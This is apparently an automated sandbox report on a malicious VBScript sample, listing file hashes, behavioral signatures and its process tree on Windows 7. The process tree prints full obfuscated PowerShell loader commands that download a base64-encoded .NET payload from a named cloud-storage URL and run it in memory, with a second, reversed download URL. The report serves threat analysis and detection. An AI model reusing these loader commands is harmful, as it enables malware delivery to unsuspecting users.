Analysis
-
max time kernel
122s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
26-07-2024 16:51
Static task
static1
Behavioral task
behavioral1
Sample
AlertasyNotificaciones.vbs
Resource
win7-20240708-en
General
-
Target
AlertasyNotificaciones.vbs
-
Size
2.6MB
-
MD5
f85469b805e7ccd3da7f69df07566f0d
-
SHA1
e9d9b0ddda2aa1e0345b1a88a491f0ee43bdcdc0
-
SHA256
ef5fa3f193d8205806fc945aea79ea2aeddb8845d1d9e81e22e57370db09c426
-
SHA512
4bc1d37bce587cd3a2ba02bd0341f7a718e5b8b974b769a46c12fbb1ca8df4424955436c3ae40b06cfaa3b9ad2085ed712ca77e1df5e0e34fffcf244b05b121f
-
SSDEEP
1536:bPPPPPPPPP9PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP5:/f
Malware Config
Extracted
https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 3040 powershell.exe -
pid Process 2180 powershell.exe 3040 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2180 powershell.exe 3040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2180 powershell.exe Token: SeDebugPrivilege 3040 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1940 wrote to memory of 2180 1940 WScript.exe 30 PID 1940 wrote to memory of 2180 1940 WScript.exe 30 PID 1940 wrote to memory of 2180 1940 WScript.exe 30 PID 2180 wrote to memory of 3040 2180 powershell.exe 32 PID 2180 wrote to memory of 3040 2180 powershell.exe 32 PID 2180 wrote to memory of 3040 2180 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AlertasyNotificaciones.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bi▒GI▒bQBw▒G8▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒GU▒Z▒Br▒GQ▒Yw▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒Hg▒bwB3▒HE▒aQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒e▒Bv▒Hc▒cQBp▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒aQB2▒G4▒ZQ▒v▒HM▒Z▒Bh▒G8▒b▒Bu▒Hc▒bwBk▒C8▒cwBh▒Gc▒cgBh▒GM▒cwBl▒GQ▒LwBj▒GQ▒cwBh▒GM▒Z▒▒v▒Gc▒cgBv▒C4▒d▒Bl▒Gs▒YwB1▒GI▒d▒Bp▒GI▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒Bl▒GQ▒awBk▒GM▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒F8▒XwBf▒F8▒ZgBn▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bi▒GI▒bQBw▒G8▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\AlertasyNotificaciones.vbs');powershell -command $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$bbmpo = '0';$edkdc = 'C:\Users\Admin\AppData\Local\Temp\AlertasyNotificaciones.vbs';[Byte[]] $xowqi = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($xowqi).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $edkdc , '________fg_______________-------------', $bbmpo, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD505d0c5fcc182b9875ec53e99d046b528
SHA12895a6e8cba9cc4888fa06fa94113e49fb55aa16
SHA25642e4f8c60de39e13e4660691e8f2e2bb0f8ce10086546a60b73aaada517925b4
SHA5129996a0a500b47deffb151bc4b6dbd36e437f7b626098cab8fe8b82e2b6b9e28a3641756bcc2f672a1786aca8ab172fc8b18d7183ab7276cc7651dcc885e2e3b1